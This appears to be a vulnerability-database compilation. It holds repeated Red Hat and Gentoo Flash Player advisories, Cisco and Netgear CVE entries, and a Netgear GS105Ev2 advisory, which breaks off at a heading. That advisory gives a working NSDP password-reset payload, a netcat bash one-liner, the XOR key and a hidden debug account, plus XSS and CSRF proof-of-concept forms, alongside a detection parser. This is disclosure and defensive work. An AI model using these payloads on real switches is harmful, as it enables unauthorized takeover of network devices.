1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21)
1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0547.html
https://www.redhat.com/security/data/cve/CVE-2014-0548.html
https://www.redhat.com/security/data/cve/CVE-2014-0549.html
https://www.redhat.com/security/data/cve/CVE-2014-0550.html
https://www.redhat.com/security/data/cve/CVE-2014-0551.html
https://www.redhat.com/security/data/cve/CVE-2014-0552.html
https://www.redhat.com/security/data/cve/CVE-2014-0553.html
https://www.redhat.com/security/data/cve/CVE-2014-0554.html
https://www.redhat.com/security/data/cve/CVE-2014-0555.html
https://www.redhat.com/security/data/cve/CVE-2014-0556.html
https://www.redhat.com/security/data/cve/CVE-2014-0557.html
https://www.redhat.com/security/data/cve/CVE-2014-0559.html
https://access.redhat.com/security/updates/classification/#critical
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406"
References
==========
[ 1 ] CVE-2014-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547
[ 2 ] CVE-2014-0548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548
[ 3 ] CVE-2014-0549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549
[ 4 ] CVE-2014-0550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550
[ 5 ] CVE-2014-0551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551
[ 6 ] CVE-2014-0552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552
[ 7 ] CVE-2014-0553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553
[ 8 ] CVE-2014-0554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554
[ 9 ] CVE-2014-0555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555
[ 10 ] CVE-2014-0556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556
[ 11 ] CVE-2014-0557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557
[ 12 ] CVE-2014-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201409-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201409-0423 | CVE-2014-0554 | Adobe Flash Player and Adobe AIR Vulnerable to access restriction bypass |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to bypass intended access restrictions via unspecified vectors.
Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks. Security flaws exist in several Adobe products.
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2014:1173-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html
Issue date: 2014-09-10
CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549
CVE-2014-0550 CVE-2014-0551 CVE-2014-0552
CVE-2014-0553 CVE-2014-0554 CVE-2014-0555
CVE-2014-0556 CVE-2014-0557 CVE-2014-0559
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21,
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551,
CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556,
CVE-2014-0557, CVE-2014-0559)
A flaw in flash-plugin could allow an attacker to bypass the same-origin
policy. (CVE-2014-0548)
All users of Adobe Flash Player should install this updated package, which
upgrades Flash Player to version 11.2.202.406.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21)
1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0547.html
https://www.redhat.com/security/data/cve/CVE-2014-0548.html
https://www.redhat.com/security/data/cve/CVE-2014-0549.html
https://www.redhat.com/security/data/cve/CVE-2014-0550.html
https://www.redhat.com/security/data/cve/CVE-2014-0551.html
https://www.redhat.com/security/data/cve/CVE-2014-0552.html
https://www.redhat.com/security/data/cve/CVE-2014-0553.html
https://www.redhat.com/security/data/cve/CVE-2014-0554.html
https://www.redhat.com/security/data/cve/CVE-2014-0555.html
https://www.redhat.com/security/data/cve/CVE-2014-0556.html
https://www.redhat.com/security/data/cve/CVE-2014-0557.html
https://www.redhat.com/security/data/cve/CVE-2014-0559.html
https://access.redhat.com/security/updates/classification/#critical
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406"
References
==========
[ 1 ] CVE-2014-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547
[ 2 ] CVE-2014-0548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548
[ 3 ] CVE-2014-0549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549
[ 4 ] CVE-2014-0550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550
[ 5 ] CVE-2014-0551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551
[ 6 ] CVE-2014-0552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552
[ 7 ] CVE-2014-0553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553
[ 8 ] CVE-2014-0554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554
[ 9 ] CVE-2014-0555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555
[ 10 ] CVE-2014-0556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556
[ 11 ] CVE-2014-0557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557
[ 12 ] CVE-2014-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201409-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201409-0424 | CVE-2014-0555 | Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, and CVE-2014-0552. An attacker could execute arbitrary code or cause a denial of service (memory corruption).
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Security flaws exist in several Adobe products.
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2014:1173-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html
Issue date: 2014-09-10
CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549
CVE-2014-0550 CVE-2014-0551 CVE-2014-0552
CVE-2014-0553 CVE-2014-0554 CVE-2014-0555
CVE-2014-0556 CVE-2014-0557 CVE-2014-0559
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21,
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551,
CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556,
CVE-2014-0557, CVE-2014-0559)
A flaw in flash-plugin could allow an attacker to bypass the same-origin
policy.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21)
1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.406-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.406-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.406-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.406-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-0547.html
https://www.redhat.com/security/data/cve/CVE-2014-0548.html
https://www.redhat.com/security/data/cve/CVE-2014-0549.html
https://www.redhat.com/security/data/cve/CVE-2014-0550.html
https://www.redhat.com/security/data/cve/CVE-2014-0551.html
https://www.redhat.com/security/data/cve/CVE-2014-0552.html
https://www.redhat.com/security/data/cve/CVE-2014-0553.html
https://www.redhat.com/security/data/cve/CVE-2014-0554.html
https://www.redhat.com/security/data/cve/CVE-2014-0555.html
https://www.redhat.com/security/data/cve/CVE-2014-0556.html
https://www.redhat.com/security/data/cve/CVE-2014-0557.html
https://www.redhat.com/security/data/cve/CVE-2014-0559.html
https://access.redhat.com/security/updates/classification/#critical
http://helpx.adobe.com/security/products/flash-player/apsb14-21.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406"
References
==========
[ 1 ] CVE-2014-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547
[ 2 ] CVE-2014-0548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548
[ 3 ] CVE-2014-0549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549
[ 4 ] CVE-2014-0550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550
[ 5 ] CVE-2014-0551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551
[ 6 ] CVE-2014-0552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552
[ 7 ] CVE-2014-0553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553
[ 8 ] CVE-2014-0554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554
[ 9 ] CVE-2014-0555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555
[ 10 ] CVE-2014-0556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556
[ 11 ] CVE-2014-0557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557
[ 12 ] CVE-2014-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201409-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201409-0397 | CVE-2014-3343 | Cisco IOS XR Service disruption in (DoS) Vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cisco IOS XR 5.1 allows remote attackers to cause a denial of service (DHCPv6 daemon crash) via a malformed DHCPv6 packet, aka Bug ID CSCuo59052. Cisco IOS XR is a member of the Cisco IOS Software family that uses a microkernel-based operating system architecture.
Attackers can exploit this issue to cause the affected device to crash, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuo59052
| VAR-201409-0175 | CVE-2014-4864 | Netgear ProSafe Plus Configuration Utility writes out plaintext passwords to backup configuration files |
CVSS V2: 3.3 CVSS V3: - Severity: LOW |
The NETGEAR ProSafe Plus Configuration Utility creates configuration backup files containing cleartext passwords, which might allow remote attackers to obtain sensitive information by reading a file. The ProSafe Plus Configuration Utility provided by Netgear has a function to back up the switch settings. CWE-200: Information Exposure http://cwe.mitre.org/data/definitions/200.html A third party who can access the backup file may obtain the device management password. Attackers can exploit vulnerabilities to obtain sensitive information.
# Multiple Vulnerabilities - Netgear GS105Ev2
## Product
Vendor: Netgear
Model: GS105Ev2
Firmware version: 1.3.0.3,1.4.0.2
Reference: http://downloadcenter.netgear.com/de/product/GS105Ev2#searchResults
Netgear GS105Ev2 is a Gigabit switch with 5 ports targeting SMBs.
## Status/Metrics/Identifier
Status: unfixed
CVSS v2 Vector: (AV:A/AC:L/Au:N/C:C/I:C/A:C)
CVSS Score: 8.3
CVE-ID: n/A
The highest risk is represented by the authentication bypass. This is reflected by the score.
## Author/Credits
Benedikt Westermann (TÜV Rheinland i-sec GmbH)
## Authentication bypass in NSDP
The implementation of the NSDP on the GS105Ev2 (and possibly also other switches) is flawed. An attacker with access to the broadcast domain of the switch can bypass
the authentication process. This allows the attacker to gain full control of the switch, i.e., he can modify a particular configuration or flash another firmware to
the switch.
### Detailed Description of the Vulnerability
The NSDP is a simple stateless protocol. It consists of a header, a trailer, and a body consisting of an array of type-length-value triplets.
The general structure is depicted below.
/---------------------+----------------------\
| 1 byte: version | 1 byte: packet-type |
+---------------------+----------------------+
| 2 bytes: result | 4 bytes: reserved |
+---------------------+----------------------+
| 6 bytes: src mac | 6 byte: dest mac |
+---------------------+----------------------+
| 2 bytes: reserved | 2 bytes: sequence no |
+---------------------+----------------------+
| 4 bytes: signature | 2 bytes: reserved |
+---------------------+----------------------+
| N bytes: TLV | 2 bytes: 0xFFFF |
+---------------------+----------------------/
| 2 bytes: 0x0000 |
\---------------------/
The TLV part is a sequence of type-length-value (TLV) triples. An entry has the following structure:
/----------------+-------------------+---------------\
| 2 bytes: type | 2 bytes: length l| l bytes: data |
\----------------+-------------------+---------------/
Regarding this vulnerability, the following two types are of special importance:
Type 0x0009 - write password
Type 0x9400 - unknown, but seems to indicate that no authentication is performed.
By sending the following payload to port 63322 at the IP address of the GS105Ev2 switch, the password is changed to "test".
|version|type|result|reserved |src-mac |dst-mac
01: 03 : 00:00: 00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:
|reserved|Sig. (NSDP) |TLV-type0x9400|TLV-type 0x0009 | Trailer
00:00:00:78:4e:53:44:50:94:00:00:00:00:09:00:04:3a:11:14:06:ff:ff:00:00
Hereby, the following part is of importance:
94:00:00:00:00:09:00:04:3a:11:14:06
The TLV 94:00:00:00 is an entry of type 0x9400 with no payload. This is followed by the TLV 00:09:00:04:3a:11:14:06. 0x0009 is the type "password change", 0x0004 is
the length of the password, and 3a:11:14:06 is the "encrypted" password that is about to be set. The "encryption" of the password is done by XORing the password with
the string "NtgrSmartSwitchRock". If the password is longer than the secret, the secret is used again.
If the password has been set successfully, the switch replies with the following message:
01:04:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:00:00:00:78:4e:53:44:50:00:00:00:00
If the message starts with this prefix 01:04:00:00, the password was changed successfully. This enables an attacker to gain access to the following configuration interfaces:
- Web interface HTTP://<ip-of-switch>/login.cgi
- Web interface http://<ip-of-switch>/loginhidden.cgi with user: Admin1NtgrDebugUser, e.g.:
  - http://<ip-of-switch>/bootcode_update.cgi
  - http://<ip-of-switch>/produce_burn.cgi
- Netgear Configuration utility
With this, the configuration can be changed, e.g., enabling a monitoring port, or flashing a new firmware.
The following bash script can be used to change the password to test:
echo "Please enter IP of switch:"; read ip; echo "";echo "Please enter MAC of switch (e.g. de:ad:de:ad:be:ef) :"; read mac; echo "01:03:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:00:00:00:78:4e:53:44:50:94:00:00:00:00:09:00:04:3a:11:14:06:ff:ff:00:00" | sed "s/c0:ff:d4:ba:61:fc/$mac/g;s/://g" | xxd -r -p | nc -q 0 -b -u $ip 63322
For a switch with the IP 192.168.0.239 and the MAC c0:ff:d4:ba:61:fc, the output (and input) would look like this:
Please enter IP of switch:
192.168.0.239
Please enter MAC of switch (e.g. de:ad:de:ad:be:ef) :
c0:ff:d4:ba:61:fc
If the password is not changed, reboot the switch, as this little bash script does not take the SEQ number into account.
It should be noted that the authentication bypass is not limited to the "set password" function. Other write functions are also affected by this vulnerability.
Please note that the "encryption" scheme for the password is broken. The encryption string can easily be recovered by a simple XOR operation on a known password (NtgrSmartSwitchRock). Thus, an attacker within the broadcast domain can eavesdrop and decode the password. This fact was already noted in [Security by Obscurity bei Netgear Switches].
[Security by Obscurity bei Netgear Switches]: - http://www.linux-magazin.de/Blogs/Insecurity-Bulletin/Gastbeitrag-Security-by-Obscurity-bei-Netgear-Switches
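For monitoring a segment that carries NSDP, the following added example (not part of the original advisory) parses a captured datagram according to the layout above and flags the pattern described: a 0x9400 entry combined with a 0x0009 password write. It assumes TLVs begin directly after the 4-byte "NSDP" signature, as in the annotated sample payload (the two reserved bytes shown in the diagram do not appear there); the function names and alert strings are hypothetical.

```python
import struct
from itertools import cycle

XOR_KEY = b"NtgrSmartSwitchRock"   # obfuscation string given in the advisory
TLV_OFFSET = 28                    # assumption: TLVs start right after "NSDP"
T_WRITE_PASSWORD, T_NO_AUTH, T_END = 0x0009, 0x9400, 0xFFFF

# Payload quoted in the advisory, used here only as parser input.
SAMPLE = bytes.fromhex((
    "01:03:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:"
    "00:00:00:78:4e:53:44:50:94:00:00:00:00:09:00:04:3a:11:14:06:ff:ff:00:00"
).replace(":", ""))


def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_nsdp(pkt):
    """Split one NSDP datagram into header fields and TLVs (ValueError if malformed)."""
    if len(pkt) < TLV_OFFSET or pkt[24:28] != b"NSDP":
        raise ValueError("not an NSDP datagram")
    version, ptype, result = struct.unpack_from(">BBH", pkt, 0)
    (seq,) = struct.unpack_from(">H", pkt, 22)
    tlvs, off = [], TLV_OFFSET
    while off + 4 <= len(pkt):
        tlv_type, length = struct.unpack_from(">HH", pkt, off)
        off += 4
        if tlv_type == T_END and length == 0:      # trailer ff:ff:00:00
            break
        if off + length > len(pkt):
            raise ValueError(f"TLV 0x{tlv_type:04x} overruns the datagram")
        tlvs.append((tlv_type, pkt[off:off + length]))
        off += length
    return {"version": version, "type": ptype, "result": result,
            "src": mac(pkt[8:14]), "dst": mac(pkt[14:20]), "seq": seq, "tlvs": tlvs}


def xor_deobfuscate(data):
    """Undo the repeating-key XOR the advisory describes."""
    return bytes(b ^ k for b, k in zip(data, cycle(XOR_KEY)))


def findings(pkt):
    """Return alert strings for the patterns the advisory describes."""
    parsed = parse_nsdp(pkt)
    types = [t for t, _ in parsed["tlvs"]]
    alerts = []
    if T_NO_AUTH in types:
        alerts.append("tlv-0x9400-present")
    if T_WRITE_PASSWORD in types:
        alerts.append("password-write")
    if T_NO_AUTH in types and T_WRITE_PASSWORD in types:
        alerts.append(f"unauthenticated-password-write from {parsed['src']} to {parsed['dst']}")
    return alerts


if __name__ == "__main__":
    for alert in findings(SAMPLE):
        print(alert)
```

Since the advisory lists the issue as unfixed, alerts like these are only useful alongside restricting who can reach UDP port 63322 on the switch's broadcast domain.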
## Multiple Vulnerabilities in Web-Interface
Though we did not perform a full analysis of the web interface, we noticed that the web interface is prone to several vulnerabilities, i.e., XSS, CSRF, and insufficient protection of the password.
### Detailed Description of the Vulnerabilities
#### XSS
We noticed that the web interface does not properly encode the output. This allows reflected Cross-Site Scripting attacks. The issue can be reproduced with the following request:
POST /switch_info.cgi HTTP/1.1
Host: 192.168.0.239
Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
switch_name='onclick=alert(1)&dhcpMode=0&ip_address='><Script>alert(&subnet_mask=1)</script>'&gateway_address=
Alternatively, the following HTML-document can be opened to trigger the XSS.
<html>
<body>
<form action="http://192.168.0.239/switch_info.cgi" method="POST">
<input type="hidden" name="switch_name" value="Blubb" />
<input type="hidden" name="dhcpMode" value="0" />
<input type="hidden" name="ip_address" value="'><Script>alert(" />
<input type="hidden" name="subnet_mask" value="1)</script>'" />
<input type="hidden" name="gateway_address" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The following fields are affected: IP Address, Netmask, Gateway Address.
#### CSRF
In addition, the web application has no protection against Cross-Site request forgery attacks. With the following PoC, the problem can be reproduced:
<html>
<body>
<form action="http://192.168.0.239/switch_info.cgi" method="POST">
<input type="hidden" name="switch_name" value="CSRF" />
<input type="hidden" name="dhcpMode" value="0" />
<input type="hidden" name="ip_address" value="192.168.0.239" />
<input type="hidden" name="subnet_mask" value="255.255.255.0" />
<input type="hidden" name="gateway_address" value="192.168.0.1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#### Password Disclosure
Moreover, the backup file of the configuration stores the password in plaintext when the web interface is used to create the configuration (fixed with 1.4.0.2). The password, secretPass, is stored in plaintext in the configuration file:
hexdump -C GS105Ev2.cfg
00000000 23 79 23 79 00 c0 a8 00 ef ff ff ff 00 c0 a8 00 |#y#y............|
00000010 01 00 00 00 00 00 00 61 64 6d 69 6e 00 00 00 00 |.......admin....|
00000020 73 65 63 72 65 74 50 61 73 73 00 00 00 00 00 00 |secretPass......|
00000030 00 00 00 00 00 00 0f ff f8 00 0f ff f8 00 0f ff |................|
00000040 f8 00 0f ff f8 00 0f ff f8 00 0f ff f8 00 0f ff |................|
CVE-2014-4864 describes the problem for the NSDP protocol.
#### Predictable Cookies
